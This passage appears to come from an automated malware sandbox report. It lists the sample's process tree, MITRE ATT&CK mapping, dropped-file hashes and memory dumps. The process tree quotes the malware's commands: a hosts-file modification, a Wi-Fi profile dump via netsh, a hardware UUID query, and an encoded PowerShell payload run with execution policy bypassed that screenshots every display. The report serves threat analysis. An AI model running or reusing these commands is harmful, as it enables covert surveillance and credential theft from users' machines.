    - Suspicious behavior: EnumeratesProcesses
    PID:4536
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    PID:2144
- - C:\Windows\system32\attrib.exe
    attrib -r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:4736
- - C:\Windows\system32\attrib.exe
    attrib +r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:396
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kda2frqb\kda2frqb.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4912
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB093.tmp" "c:\Users\Admin\AppData\Local\Temp\kda2frqb\CSC72B014D6F2E34CC78EE09FEE9173215B.TMP"
        5⤵
        
        PID:2928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3684 -ip 3684
1⤵
PID:964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
da5c82b0e070047f7377042d08093ff4

SHA1
89d05987cd60828cca516c5c40c18935c35e8bd3

SHA256
77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

SHA512
7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

Download Submit
C:\Users\Admin\AppData\Local\Temp\FzZlj7ZUx6\Display (1).png

Filesize
212KB

MD5
5f9719f08e94014d3bf22686b460fc9a

SHA1
14373eb111e9c4e7df9eabaf7ce548d4b25e1faf

SHA256
b690283087ad702be90d162413260bab3454e22c36665637a7b6474f81577fb5

SHA512
17c6f6e4054eea1a92e9183aa888012860df9160f54fbb204ffe539f560337439e19c84a8973433424e48fffcbf84af567426fd4ab72bbafec537778ef349977

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB093.tmp

Filesize
1KB

MD5
d1a0555524e43841ea8b1d75116f47d7

SHA1
0d664a57b346e811de2e576d5fb2c8cc14cf5b8a

SHA256
506927f5df982f7b5cb203daf94ee5390bdf0bebda54a18f2e805ab511f59a70

SHA512
f04a883594d2f028a1eaf1a6d52419f9aa54040388d60329f2cb5628cd78f63877b1f6d6fad6df8ecdae50645af357df682f50d5e527abda7e48264da7f39caa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uspsvkv4.oox.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kda2frqb\kda2frqb.dll

Filesize
4KB

MD5
e70f518f6ef9214688b0499549f4d241

SHA1
800c1cc2a32649d845e0f8c67d48d00cd4adf3c6

SHA256
70865905fe56aa73e905d0795f62b64fe25ee33248de2894de9bfe4ae4eaa497

SHA512
f8c8edd78f32053da013f577360781c6e8783d1cfac6a1e806d837c9fb949dba75fdeca0c50f4f95f012be560139a41d5737923a218680284b58c12331e9c36a

Download Submit
C:\Windows\Speech\Update.exe

Filesize
9.5MB

MD5
f7acb232a20cc906ea7f483579dea1cd

SHA1
96d52266fcd1cf051709e3c96968ab2f1dfaf94b

SHA256
0cdf178028f1f8467372158288bec5a6b2a1c3ff9107adc16b3403834aacd84e

SHA512
000756041cc76006fcc004515a93e28d43c49083ce7fa4fc8b15febe9f06a39e2dcbe3dbbc1f5a600df4cb41cac6a9351e41eef16922c783debbb26394240876

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
978KB

MD5
244aa7b1f310333e74fdfbf2cce0143b

SHA1
988ea338640a0432c0aa55b2cfab8b427477ffc7

SHA256
09ce9019bd9dab2f9b2c4bc5b9875c72dd6b6ca63fc347490ccaa52454d8f211

SHA512
cebaabe6f212c2679555d08df43e6acde65f53af1217751a9263dbe5866544538954c684d9aead88c4febdf7e6c67b41d93bd2c20fa352c54ce605c4af3c8e7b

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kda2frqb\CSC72B014D6F2E34CC78EE09FEE9173215B.TMP

Filesize
652B

MD5
af74809e5a139dfabdfc5aa7e2a6a31c

SHA1
04984b77a926c03a0326083805b7d190d173cbbb

SHA256
347fddc9e745daffc988dcfdb769748ba33dc5a5dbe1f692772b691fa7cef0ae

SHA512
52bb2e90ad01209f8027bc020945cda4957f607edb2af23d0db43ff73ec8140313fc1761b8b16175607035b101f02f82d5cd7f215325ce33bde61f597ea86c31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kda2frqb\kda2frqb.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kda2frqb\kda2frqb.cmdline

Filesize
607B

MD5
d360b257e67db7f6351995a3ba48e62d

SHA1
fc35a069639958ab6c26522b62d66d75e2c7f60d

SHA256
a8221d0ea762dcd02781e8274804755ae43f246e0e2090bd370f465d323d118e

SHA512
aef97aa9abe383747408c324e9582a2cb417c35ba966e1f9901e0acc82d3c87bb649717072365d8142244b3563acba85093a2fe1b7307654a66feff7fa53ffa5

Download Submit
memory/440-0-0x00007FFD4FC50000-0x00007FFD4FC52000-memory.dmp

Filesize
8KB

Download
memory/440-83-0x00007FF666C40000-0x00007FF668497000-memory.dmp

Filesize
24.3MB

Download
memory/440-84-0x00007FF666F10000-0x00007FF667629000-memory.dmp

Filesize
7.1MB

Download
memory/440-1-0x00007FF666C40000-0x00007FF668497000-memory.dmp

Filesize
24.3MB

Download
memory/440-3-0x00007FF666F10000-0x00007FF667629000-memory.dmp

Filesize
7.1MB

Download
memory/2728-12-0x0000000005120000-0x000000000512A000-memory.dmp

Filesize
40KB

Download
memory/2728-23-0x00000000080D0000-0x000000000811C000-memory.dmp

Filesize
304KB

Download
memory/2728-22-0x0000000007F70000-0x0000000007FAC000-memory.dmp

Filesize
240KB

Download
memory/2728-21-0x0000000007F10000-0x0000000007F22000-memory.dmp

Filesize
72KB

Download
memory/2728-20-0x0000000007FC0000-0x00000000080CA000-memory.dmp

Filesize
1.0MB

Download
memory/2728-19-0x00000000083D0000-0x00000000089E8000-memory.dmp

Filesize
6.1MB

Download
memory/2728-11-0x0000000005190000-0x0000000005222000-memory.dmp

Filesize
584KB

Download
memory/2728-10-0x00000000056A0000-0x0000000005C44000-memory.dmp

Filesize
5.6MB

Download
memory/2728-9-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/4044-76-0x0000026462C60000-0x0000026462C68000-memory.dmp

Filesize
32KB

Download
memory/4844-24-0x000001C6D7B00000-0x000001C6D7B22000-memory.dmp

Filesize
136KB

Download